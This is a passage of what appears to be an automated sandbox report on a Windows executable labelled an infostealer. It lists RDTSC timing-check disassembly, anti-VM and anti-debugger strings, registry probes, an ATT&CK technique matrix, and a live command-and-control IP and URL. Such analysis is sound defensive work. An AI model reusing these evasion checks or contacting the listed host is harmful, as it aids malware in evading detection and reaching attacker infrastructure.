Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1298933 second address: 1298992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C686h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnp 00007F930851C676h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push esi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pop esi 0x0000001e pushad 0x0000001f jmp 00007F930851C684h 0x00000024 jmp 00007F930851C689h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129905E second address: 1299064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1299064 second address: 1299068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129BDD3 second address: 129BDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129BE40 second address: 129BE53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F930851C67Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129BE53 second address: 129BE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C05A second address: 129C061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C42C second address: 129C438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C438 second address: 129C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F930851C676h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C445 second address: 129C4A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb dl, 00000053h 0x0000000b push dword ptr [ebp+122D3507h] 0x00000011 and edx, 6B7894B3h 0x00000017 call 00007F9308CAD929h 0x0000001c jp 00007F9308CAD930h 0x00000022 push eax 0x00000023 pushad 0x00000024 jnc 00007F9308CAD937h 0x0000002a jmp 00007F9308CAD92Eh 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C4A5 second address: 129C4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F930851C680h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C4C2 second address: 129C4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C4C6 second address: 129C4F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F930851C680h 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F930851C67Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129D835 second address: 129D845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jl 00007F9308CAD93Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129D845 second address: 129D84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129D84B second address: 129D851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129F3D3 second address: 129F3DE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129EFDC second address: 129EFF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Bh 0x00000007 jmp 00007F9308CAD92Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0008 second address: 75B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B000C second address: 75B0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0012 second address: 75B004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F930851C684h 0x00000009 adc cx, 8D28h 0x0000000e jmp 00007F930851C67Bh 0x00000013 popfd 0x00000014 mov dx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edx 0x0000001f pop ecx 0x00000020 mov bh, 06h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B004A second address: 75B007B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD935h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9308CAD933h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B007B second address: 75B0098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C689h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0098 second address: 75B00B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00B4 second address: 75B00B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00B8 second address: 75B00BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00BE second address: 75B00D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F930851C681h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00D3 second address: 75B00E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00E3 second address: 75B00F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C682h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00F9 second address: 75B0125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9308CAD935h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0125 second address: 75B01A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d mov si, 0FE3h 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 jmp 00007F930851C682h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F930851C67Ch 0x00000022 or ecx, 58052358h 0x00000028 jmp 00007F930851C67Bh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F930851C688h 0x00000034 adc ch, FFFFFFB8h 0x00000037 jmp 00007F930851C67Bh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B01A2 second address: 75B01CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9308CAD92Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B01CF second address: 75B01FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c jmp 00007F930851C67Eh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 push eax 0x00000017 push edx 0x00000018 mov ebx, eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B01FE second address: 75B0228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD934h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9308CAD92Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0228 second address: 75B022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B022E second address: 75B026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F9308CAD939h 0x0000000e mov esi, dword ptr [775606ECh] 0x00000014 jmp 00007F9308CAD92Eh 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B026C second address: 75B0270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0270 second address: 75B0276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0276 second address: 75B02FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F930851C680h 0x0000000b adc esi, 554E3328h 0x00000011 jmp 00007F930851C67Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007F930851D568h 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007F930851C682h 0x00000027 pushfd 0x00000028 jmp 00007F930851C682h 0x0000002d adc cl, FFFFFFB8h 0x00000030 jmp 00007F930851C67Bh 0x00000035 popfd 0x00000036 popad 0x00000037 push ecx 0x00000038 pushad 0x00000039 popad 0x0000003a pop edx 0x0000003b popad 0x0000003c xchg eax, edi 0x0000003d jmp 00007F930851C680h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1325 second address: 75B1329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1329 second address: 75B132F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B132F second address: 75B1335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1335 second address: 75B1339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1339 second address: 75B133D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B133D second address: 75B1387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+20h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9308CAD938h 0x00000012 jmp 00007F9308CAD935h 0x00000017 popfd 0x00000018 push eax 0x00000019 mov bx, 12C2h 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov dword ptr [edx+20h], eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1387 second address: 75B138B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1469 second address: 75B1492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d pushad 0x0000000e movzx eax, bx 0x00000011 push eax 0x00000012 push edx 0x00000013 mov al, dl 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1492 second address: 75B14B8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2DFC4F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ax, word ptr [esi+32h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F930851C684h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14B8 second address: 75B14BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14BC second address: 75B14C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14C2 second address: 75B14DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14DD second address: 75B14E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 02h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14E4 second address: 75B14EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B14EA second address: 75B151C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b jmp 00007F930851C683h 0x00000010 mov dword ptr [edx+34h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F930851C67Bh 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B151C second address: 75B1555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F9308CAD935h 0x00000016 pop ecx 0x00000017 jmp 00007F9308CAD931h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B1555 second address: 75B155B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exe
  Special instruction interceptor: First address: F1B927 instructions caused by: Self-modifying code
  Special instruction interceptor: First address: 10C5146 instructions caused by: Self-modifying code
  Special instruction interceptor: First address: 10C3958 instructions caused by: Self-modifying code
  Special instruction interceptor: First address: 10EE743 instructions caused by: Self-modifying code
  Special instruction interceptor: First address: 10D6ED4 instructions caused by: Self-modifying code
  Special instruction interceptor: First address: F1B8FD instructions caused by: Self-modifying code
  Special instruction interceptor: First address: 115957D instructions caused by: Self-modifying code
  Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
  Code function: 0_2_0758035B rdtsc 0_2_0758035B
  API coverage: 2.8 %
  Last function: Thread delayed
  File Volume queried: C:\ FullSizeInformation
Source: iuO4kwUi17.exe, iuO4kwUi17.exe, 00000000.00000002.1917918780.00000000010A6000.00000040.00000001.01000000.00000003.sdmp
  Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp
  Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: iuO4kwUi17.exe, 00000000.00000003.1486182856.0000000006E11000.00000004.00000020.00020000.00000000.sdmp
  Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: Amcache.hve.5.dr
  Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
  Binary or memory string: c:/windows/system32/drivers/vmci.sys
  Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
  Binary or memory string: vmci.sys
Source: iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp
  Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001C6E000.00000004.00000020.00020000.00000000.sdmp
  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOaZx{+P
Source: iuO4kwUi17.exe, 00000000.00000002.1917918780.00000000010A6000.00000040.00000001.01000000.00000003.sdmp
  Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.5.dr
  Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\iuO4kwUi17.exe
  System information queried: ModuleInformation
  Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\iuO4kwUi17.exe
  Thread information set: HideFromDebugger
  Open window title or class name: regmonclass
  Open window title or class name: gbdyllo
  Open window title or class name: process monitor - sysinternals: www.sysinternals.com
  Open window title or class name: procmon_window_class
  Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
  Open window title or class name: ollydbg
  Open window title or class name: filemonclass
  Open window title or class name: file monitor - sysinternals: www.sysinternals.com
  File opened: NTICE
  File opened: SICE
  File opened: SIWVID
  Process queried: DebugPort
Source: C:\Users\user\Desktop\iuO4kwUi17.exe
  Code function: 0_2_0758035B rdtsc 0_2_0758035B
Source: iuO4kwUi17.exe, iuO4kwUi17.exe, 00000000.00000002.1917918780.00000000010A6000.00000040.00000001.01000000.00000003.sdmp
  Binary or memory string: 2Program Manager
Source: C:\Users\user\Desktop\iuO4kwUi17.exe
  Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\iuO4kwUi17.exe
  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp
  Binary or memory string: procmon.exe
Source: Amcache.hve.5.dr
  Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
  Binary or memory string: msmpeng.exe
Source: iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp
  Binary or memory string: wireshark.exe
Source: Amcache.hve.5.dr
  Binary or memory string: c:\program files\windows defender\msmpeng.exe
  Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: global traffic
  TCP traffic: 192.168.2.10:49704 -> 185.121.15.192:80
  TCP traffic: 192.168.2.10:49705 -> 185.121.15.192:80
  TCP traffic: 192.168.2.10:49706 -> 185.121.15.192:80
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 2 Process Injection | 23 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Process Injection | LSASS Memory | 23 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 12 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 214 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |

| Source | Detection | Scanner | Label | Link |
| iuO4kwUi17.exe | 47% | ReversingLabs | Win32.Infostealer.Tinba | |
| iuO4kwUi17.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
| iuO4kwUi17.exe | 100% | Joe Sandbox ML | | |
No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| home.fivetk5ht.top | 185.121.15.192 | true | false | | high |
| httpbin.org | 98.85.100.80 | true | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
| http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 | false | | high |
| https://httpbin.org/ip | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
| https://curl.se/docs/hsts.html | iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://html4/loose.dtd | iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp | iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| https://httpbin.org/ipbefore | iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | false | | high |
